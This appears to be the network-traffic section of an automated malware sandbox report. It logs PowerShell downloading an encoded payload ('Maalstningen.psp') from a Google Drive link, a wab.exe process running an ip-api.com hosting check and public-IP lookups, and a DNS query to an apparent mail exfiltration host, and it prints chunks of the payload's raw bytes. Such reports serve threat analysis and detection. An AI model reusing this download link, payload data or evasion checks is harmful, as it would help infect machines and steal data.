                                                        Apr 18, 2024 11:07:59.027218103 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.028851986 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.028944016 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.028949976 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.029041052 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.030704975 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.030931950 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.030939102 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.031006098 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.032268047 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.032361031 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.032370090 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.032434940 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.033860922 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.034001112 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.034049034 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.034049034 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.034197092 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:59.034212112 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:59.483901978 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:07:59.483941078 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:07:59.484010935 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:07:59.485848904 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:07:59.485861063 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:07:59.705035925 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:07:59.705097914 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:07:59.707353115 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:07:59.707361937 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:07:59.707609892 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:07:59.710762024 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:07:59.752119064 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:08:00.002708912 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:08:00.002878904 CEST44349715104.26.13.205192.168.2.9
                                                        Apr 18, 2024 11:08:00.002937078 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:08:00.006352901 CEST49715443192.168.2.9104.26.13.205
                                                        Apr 18, 2024 11:08:00.114505053 CEST4971680192.168.2.9208.95.112.1
                                                        Apr 18, 2024 11:08:00.230349064 CEST8049716208.95.112.1192.168.2.9
                                                        Apr 18, 2024 11:08:00.230449915 CEST4971680192.168.2.9208.95.112.1
                                                        Apr 18, 2024 11:08:00.230763912 CEST4971680192.168.2.9208.95.112.1
                                                        Apr 18, 2024 11:08:00.348381042 CEST8049716208.95.112.1192.168.2.9
                                                        Apr 18, 2024 11:08:00.402947903 CEST4971680192.168.2.9208.95.112.1
                                                        Apr 18, 2024 11:08:01.557657957 CEST4971680192.168.2.9208.95.112.1
                                                        Apr 18, 2024 11:08:01.676327944 CEST8049716208.95.112.1192.168.2.9
                                                        Apr 18, 2024 11:08:01.676436901 CEST4971680192.168.2.9208.95.112.1

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 18, 2024 11:07:09.339632988 CEST6280053192.168.2.91.1.1.1
                                                        Apr 18, 2024 11:07:09.443852901 CEST53628001.1.1.1192.168.2.9
                                                        Apr 18, 2024 11:07:09.918910027 CEST5573053192.168.2.91.1.1.1
                                                        Apr 18, 2024 11:07:10.025685072 CEST53557301.1.1.1192.168.2.9
                                                        Apr 18, 2024 11:07:59.374245882 CEST5166153192.168.2.91.1.1.1
                                                        Apr 18, 2024 11:07:59.479171038 CEST53516611.1.1.1192.168.2.9
                                                        Apr 18, 2024 11:08:00.009569883 CEST5204553192.168.2.91.1.1.1
                                                        Apr 18, 2024 11:08:00.113759995 CEST53520451.1.1.1192.168.2.9
                                                        Apr 18, 2024 11:08:01.558650970 CEST5240853192.168.2.91.1.1.1
                                                        Apr 18, 2024 11:08:01.680903912 CEST53524081.1.1.1192.168.2.9

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Apr 18, 2024 11:07:09.339632988 CEST192.168.2.91.1.1.10x8020Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.918910027 CEST192.168.2.91.1.1.10xf7bcStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:59.374245882 CEST192.168.2.91.1.1.10x8f3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:08:00.009569883 CEST192.168.2.91.1.1.10xb576Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:08:01.558650970 CEST192.168.2.91.1.1.10xfd7Standard query (0)mail.myhydropowered.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 18, 2024 11:06:52.784538984 CEST1.1.1.1192.168.2.90x5cd2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:06:52.784538984 CEST1.1.1.1192.168.2.90x5cd2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.443852901 CEST1.1.1.1192.168.2.90x8020No error (0)drive.google.com142.251.15.139A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.443852901 CEST1.1.1.1192.168.2.90x8020No error (0)drive.google.com142.251.15.101A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.443852901 CEST1.1.1.1192.168.2.90x8020No error (0)drive.google.com142.251.15.100A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.443852901 CEST1.1.1.1192.168.2.90x8020No error (0)drive.google.com142.251.15.113A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.443852901 CEST1.1.1.1192.168.2.90x8020No error (0)drive.google.com142.251.15.102A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:09.443852901 CEST1.1.1.1192.168.2.90x8020No error (0)drive.google.com142.251.15.138A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:10.025685072 CEST1.1.1.1192.168.2.90xf7bcNo error (0)drive.usercontent.google.com142.250.105.132A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:59.479171038 CEST1.1.1.1192.168.2.90x8f3No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:59.479171038 CEST1.1.1.1192.168.2.90x8f3No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:07:59.479171038 CEST1.1.1.1192.168.2.90x8f3No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:08:00.113759995 CEST1.1.1.1192.168.2.90xb576No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                        Apr 18, 2024 11:08:01.680903912 CEST1.1.1.1192.168.2.90xfd7Server failure (2)mail.myhydropowered.comnonenoneA (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com
                                                        • api.ipify.org
                                                        • ip-api.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.949716208.95.112.1807228C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        Apr 18, 2024 11:08:00.230763912 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                        Host: ip-api.com
                                                        Connection: Keep-Alive
                                                        Apr 18, 2024 11:08:00.348381042 CEST174INHTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 09:08:00 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 5
                                                        Access-Control-Allow-Origin: *
                                                        X-Ttl: 60
                                                        X-Rl: 44
                                                        Data Raw: 74 72 75 65 0a
                                                        Data Ascii: true


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.949707142.251.15.1394437660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 09:07:09 UTC215OUTGET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Connection: Keep-Alive
                                                        2024-04-18 09:07:09 UTC1582INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 18 Apr 2024 09:07:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-dMi7Cj338ntXt-79qXfcYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.949708142.250.105.1324437660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-18 09:07:10 UTC233OUTGET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2024-04-18 09:07:11 UTC4748INHTTP/1.1 200 OK
                                                        X-GUploader-UploadID: ABPtcPrwSa-ghfPagr1Gf4IEYfqrgUHncCYMfC3V364WMkJpm0CSx8k32mGN6l4PDG1UVwiluho
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="Maalstningen.psp"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 447556
                                                        Last-Modified: Tue, 16 Apr 2024 19:10:36 GMT
                                                        Date: Thu, 18 Apr 2024 09:07:11 GMT
                                                        Expires: Thu, 18 Apr 2024 09:07:11 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=mAej5Q==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-04-18 09:07:11 UTC4748INData Raw: 36 77 4b 4d 53 48 45 42 6d 37 76 4b 57 78 6f 41 63 51 47 62 36 77 49 41 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 6a 42 74 61 34 48 45 42 6d 2b 73 43 78 6a 6d 42 38 64 6c 53 70 33 33 72 41 68 65 79 36 77 4a 30 50 34 48 78 56 55 6e 39 6e 58 45 42 6d 2b 73 43 4f 75 39 78 41 5a 76 72 41 69 48 55 75 6d 66 62 31 33 70 78 41 5a 74 78 41 5a 74 78 41 5a 76 72 41 76 57 67 4d 63 70 78 41 5a 76 72 41 6b 38 39 69 52 51 4c 63 51 47 62 36 77 4a 6e 43 39 48 69 63 51 47 62 36 77 4b 42 51 49 50 42 42 4f 73 43 52 46 33 72 41 68 64 6e 67 66 6e 32 64 70 34 46 66 4d 70 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6b 72 74 67 63 4e 4e 55 4a 59 41 36 77 4b 4b 2b 6e 45 42 6d 37 72 41 70 78 79 2f 36 77 49 57 57 2b 73 43 30 51 61
                                                        Data Ascii: 6wKMSHEBm7vKWxoAcQGb6wIAmwNcJARxAZtxAZu5jBta4HEBm+sCxjmB8dlSp33rAhey6wJ0P4HxVUn9nXEBm+sCOu9xAZvrAiHUumfb13pxAZtxAZtxAZvrAvWgMcpxAZvrAk89iRQLcQGb6wJnC9HicQGb6wKBQIPBBOsCRF3rAhdngfn2dp4FfMpxAZtxAZuLRCQEcQGbcQGbicNxAZvrAkrtgcNNUJYA6wKK+nEBm7rApxy/6wIWW+sC0Qa
                                                        2024-04-18 09:07:11 UTC4748INData Raw: 79 78 35 52 32 31 48 44 4e 74 4f 6c 62 7a 53 36 51 6b 4f 2b 58 77 32 32 36 45 70 35 2b 68 64 63 6a 31 79 63 6a 6c 4c 7a 2f 46 31 6c 32 43 42 78 78 71 79 77 6e 51 73 62 73 52 53 76 50 65 46 6d 4e 77 6b 36 46 77 4b 6e 52 43 74 68 4a 2b 71 57 30 49 70 58 66 53 63 54 2f 46 31 6c 32 43 42 78 78 71 79 77 6e 51 73 62 73 52 53 76 50 65 46 6d 4e 77 6b 36 46 77 4b 6e 52 43 74 68 4a 2b 71 57 30 49 70 58 66 53 63 54 2f 34 61 41 59 76 37 76 66 6f 30 6c 34 4c 6d 37 70 65 43 35 75 36 58 67 75 62 75 6c 34 4c 6d 37 70 65 42 52 41 52 70 79 6c 52 4a 54 70 42 7a 76 35 74 5a 67 4d 6f 70 67 79 75 75 58 73 2f 6b 47 31 4a 49 63 54 32 4d 57 48 75 35 48 59 56 65 52 6b 76 66 30 36 68 78 56 6b 69 51 78 59 55 6a 45 6e 4f 51 6f 4f 6b 7a 59 56 71 78 42 59 56 41 70 68 32 4f 59 37 44 6c
                                                        Data Ascii: yx5R21HDNtOlbzS6QkO+Xw226Ep5+hdcj1ycjlLz/F1l2CBxxqywnQsbsRSvPeFmNwk6FwKnRCthJ+qW0IpXfScT/F1l2CBxxqywnQsbsRSvPeFmNwk6FwKnRCthJ+qW0IpXfScT/4aAYv7vfo0l4Lm7peC5u6Xgubul4Lm7peBRARpylRJTpBzv5tZgMopgyuuXs/kG1JIcT2MWHu5HYVeRkvf06hxVkiQxYUjEnOQoOkzYVqxBYVAph2OY7Dl
                                                        2024-04-18 09:07:11 UTC456INData Raw: 45 2f 75 63 2b 64 6a 77 6a 6d 2f 6c 4e 5a 77 62 44 61 6f 73 32 31 51 42 53 78 31 47 7a 4f 32 48 4c 6f 35 36 4f 31 6e 43 51 6b 31 77 41 62 30 75 4f 78 33 47 4c 72 52 6a 57 79 55 79 32 72 41 42 79 5a 62 6e 2b 6f 36 6c 41 41 6c 75 69 4a 4a 72 44 44 4f 79 4a 54 4a 48 34 62 73 6d 49 53 50 47 72 6e 5a 33 79 42 32 2b 4d 33 79 45 79 47 4c 51 51 61 76 54 63 45 6a 35 57 63 39 54 56 43 65 47 44 2f 35 42 4c 72 76 47 76 73 74 73 32 4e 50 56 4a 50 47 4a 72 50 41 6b 4a 79 57 6b 4f 4f 68 44 74 56 54 52 50 47 50 2f 5a 47 50 6a 39 62 4d 43 58 70 47 44 50 44 70 4f 65 37 70 62 57 57 46 4b 2b 57 34 56 7a 44 70 6d 55 33 49 79 70 32 6d 43 71 6e 4b 4e 76 66 78 78 43 72 73 42 43 45 57 38 75 58 38 57 5a 34 6a 71 6c 30 6b 2b 6a 4d 75 76 38 52 6c 37 57 63 6f 63 6f 41 54 50 50 43 6d
                                                        Data Ascii: E/uc+djwjm/lNZwbDaos21QBSx1GzO2HLo56O1nCQk1wAb0uOx3GLrRjWyUy2rAByZbn+o6lAAluiJJrDDOyJTJH4bsmISPGrnZ3yB2+M3yEyGLQQavTcEj5Wc9TVCeGD/5BLrvGvsts2NPVJPGJrPAkJyWkOOhDtVTRPGP/ZGPj9bMCXpGDPDpOe7pbWWFK+W4VzDpmU3Iyp2mCqnKNvfxxCrsBCEW8uX8WZ4jql0k+jMuv8Rl7WcocoATPPCm
                                                        2024-04-18 09:07:11 UTC1255INData Raw: 63 6a 68 35 67 6f 6f 36 5a 43 51 53 79 59 75 2f 32 6a 68 35 34 44 67 70 4c 76 56 38 4d 46 75 6b 38 43 53 44 5a 70 36 74 66 32 62 48 61 68 4c 64 70 66 31 46 62 56 70 53 50 6d 5a 6a 6b 53 61 79 43 55 30 63 77 5a 42 30 53 5a 42 51 54 56 4b 4a 49 75 73 67 6c 51 6f 59 54 70 79 47 67 48 72 39 32 48 72 68 39 31 71 38 62 50 4b 62 4f 45 6c 72 58 38 68 4f 4a 43 49 4c 6b 48 76 4d 4f 45 6e 59 64 62 30 41 38 6e 77 77 58 4b 7a 33 4a 44 39 32 6d 70 4e 4c 6c 77 4b 49 64 79 75 38 64 51 76 53 6d 67 49 72 49 30 56 33 73 45 2b 5a 53 30 75 2f 72 4d 68 4a 44 47 6f 4e 62 48 6e 2f 59 38 42 43 52 49 70 39 6e 46 65 64 72 64 73 4b 67 54 39 2f 76 39 2b 43 5a 4c 6f 34 6a 34 45 79 62 49 43 36 73 41 46 2b 34 4d 62 34 6a 6a 42 56 53 5a 65 51 68 7a 78 74 79 47 6d 78 62 4d 34 46 33 36 48
                                                        Data Ascii: cjh5goo6ZCQSyYu/2jh54DgpLvV8MFuk8CSDZp6tf2bHahLdpf1FbVpSPmZjkSayCU0cwZB0SZBQTVKJIusglQoYTpyGgHr92Hrh91q8bPKbOElrX8hOJCILkHvMOEnYdb0A8nwwXKz3JD92mpNLlwKIdyu8dQvSmgIrI0V3sE+ZS0u/rMhJDGoNbHn/Y8BCRIp9nFedrdsKgT9/v9+CZLo4j4EybIC6sAF+4Mb4jjBVSZeQhzxtyGmxbM4F36H
                                                        2024-04-18 09:07:11 UTC1255INData Raw: 35 75 31 52 55 47 64 55 75 6f 55 43 6c 68 70 7a 72 2f 4e 74 69 70 79 6f 62 4e 4f 42 55 46 59 43 41 59 43 54 55 6e 58 34 45 42 42 41 36 6b 63 53 76 6c 79 75 76 74 6e 79 65 34 72 6d 37 70 65 43 35 75 36 58 67 75 62 75 6c 34 4c 6d 37 70 65 43 35 53 6d 6f 34 2f 4d 61 38 32 59 79 4e 30 57 34 56 39 38 6b 55 41 74 78 4e 74 2f 39 46 36 30 4a 34 4d 69 6a 51 75 37 75 6c 61 55 44 71 4c 6d 32 4a 75 61 58 67 64 64 79 32 66 77 49 47 45 4e 77 6f 70 44 44 6f 46 44 7a 7a 4e 46 54 2f 51 73 6d 73 66 68 73 67 5a 62 53 6c 4f 4b 69 37 70 65 43 35 75 36 58 67 75 62 75 6c 34 4c 6d 37 70 65 43 35 75 31 4a 44 7a 67 38 55 44 2b 4a 54 42 77 6b 49 78 63 4a 38 79 6c 55 5a 75 33 2b 4d 4d 64 70 4b 74 47 4c 58 75 62 75 6c 34 4c 6d 37 70 65 43 35 75 36 58 67 75 62 75 6c 34 4c 6c 36 33 77
                                                        Data Ascii: 5u1RUGdUuoUClhpzr/NtipyobNOBUFYCAYCTUnX4EBBA6kcSvlyuvtnye4rm7peC5u6Xgubul4Lm7peC5Smo4/Ma82YyN0W4V98kUAtxNt/9F60J4MijQu7ulaUDqLm2JuaXgddy2fwIGENwopDDoFDzzNFT/QsmsfhsgZbSlOKi7peC5u6Xgubul4Lm7peC5u1JDzg8UD+JTBwkIxcJ8ylUZu3+MMdpKtGLXubul4Lm7peC5u6Xgubul4Ll63w
                                                        2024-04-18 09:07:11 UTC1255INData Raw: 75 6c 34 45 7a 6f 4a 32 62 42 45 68 61 6a 4b 73 37 67 6c 6f 32 35 34 52 79 44 4a 4f 55 55 37 67 51 68 2f 50 6a 66 4a 42 65 48 58 79 6b 32 4f 48 77 4f 53 34 76 32 4c 4e 2b 58 59 6f 6f 67 4e 6c 63 69 41 70 75 70 73 33 34 32 36 65 65 75 59 67 33 48 44 34 4b 58 4c 69 7a 53 4e 6b 75 7a 49 6c 6e 4b 72 37 50 79 51 33 37 47 73 50 70 71 54 38 53 70 46 4f 33 6d 50 4e 4c 51 35 47 6c 30 2f 55 46 66 34 74 45 70 38 6b 66 52 7a 2f 68 42 78 54 65 79 39 7a 58 38 53 52 4f 39 30 62 79 4f 4f 5a 2b 75 50 62 56 44 44 76 52 66 61 4d 54 66 4c 61 55 33 73 4d 54 79 53 39 4c 76 4d 4f 43 6b 2b 58 63 69 50 74 72 31 45 72 35 65 46 4f 37 57 76 77 74 44 42 61 62 43 74 6d 59 56 6d 56 45 74 51 67 61 4a 6c 4f 39 33 71 4a 4d 69 41 4e 6e 30 55 4e 43 47 44 73 6a 71 48 44 5a 53 53 31 70 68 53
                                                        Data Ascii: ul4EzoJ2bBEhajKs7glo254RyDJOUU7gQh/PjfJBeHXyk2OHwOS4v2LN+XYoogNlciApups3426eeuYg3HD4KXLizSNkuzIlnKr7PyQ37GsPpqT8SpFO3mPNLQ5Gl0/UFf4tEp8kfRz/hBxTey9zX8SRO90byOOZ+uPbVDDvRfaMTfLaU3sMTyS9LvMOCk+XciPtr1Er5eFO7WvwtDBabCtmYVmVEtQgaJlO93qJMiANn0UNCGDsjqHDZSS1phS
                                                        2024-04-18 09:07:11 UTC1255INData Raw: 54 77 73 6b 48 34 4a 34 32 33 77 65 68 4e 62 4d 4e 39 54 53 4b 43 4b 73 41 43 6e 4a 79 4f 4b 64 61 37 2b 30 32 71 61 42 47 77 6b 31 4a 31 4b 44 50 48 4f 36 52 2f 37 32 64 78 32 59 56 4e 70 6f 6f 63 4e 4f 6b 2b 70 37 72 75 36 73 53 55 79 52 4f 6d 6f 4a 69 41 36 79 36 54 45 32 73 46 67 47 57 31 69 76 38 64 43 6c 78 5a 5a 45 44 66 69 61 4f 74 2b 54 66 52 53 62 47 65 7a 31 65 71 41 78 77 78 4c 5a 78 2f 49 39 57 37 49 78 52 38 6f 4a 4a 33 4a 52 50 66 67 75 62 51 68 53 4d 32 2f 70 62 6d 42 52 2f 39 68 6a 5a 2f 71 2f 79 6d 4e 39 46 6c 71 4c 5a 56 32 4f 45 71 2b 79 4d 63 57 4a 41 6b 4c 4b 5a 54 72 4f 48 72 78 49 6c 70 30 4c 4f 47 46 76 64 77 49 48 6b 77 61 43 45 35 6c 53 37 53 58 42 4b 79 59 4c 2b 6e 74 47 30 4c 4b 64 49 58 72 7a 59 6d 39 4d 36 57 7a 69 67 6c 6f
                                                        Data Ascii: TwskH4J423wehNbMN9TSKCKsACnJyOKda7+02qaBGwk1J1KDPHO6R/72dx2YVNpoocNOk+p7ru6sSUyROmoJiA6y6TE2sFgGW1iv8dClxZZEDfiaOt+TfRSbGez1eqAxwxLZx/I9W7IxR8oJJ3JRPfgubQhSM2/pbmBR/9hjZ/q/ymN9FlqLZV2OEq+yMcWJAkLKZTrOHrxIlp0LOGFvdwIHkwaCE5lS7SXBKyYL+ntG0LKdIXrzYm9M6Wziglo
